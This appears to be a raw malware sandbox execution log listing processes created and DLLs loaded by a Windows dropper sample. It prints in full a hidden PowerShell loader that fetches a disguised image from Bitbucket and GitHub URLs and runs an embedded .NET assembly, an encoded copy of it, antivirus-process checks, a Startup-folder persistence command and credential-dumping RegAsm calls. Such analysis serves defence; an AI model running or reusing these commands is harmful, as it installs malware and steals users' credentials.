#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 603423
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "speechesdjexpandingsoviet" Controllers
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif Lucas.pif s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeProcess created: C:\Windows\System32\cmd.exe cmd /c one.vbs
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP001.TMP\one.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yzbzlbqtwhlotogkfeks"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ilkgo.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr" "C:\Users\user\AppData\Local\DesignInno Innovations\H"
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: feclient.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeSection loaded: advpack.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
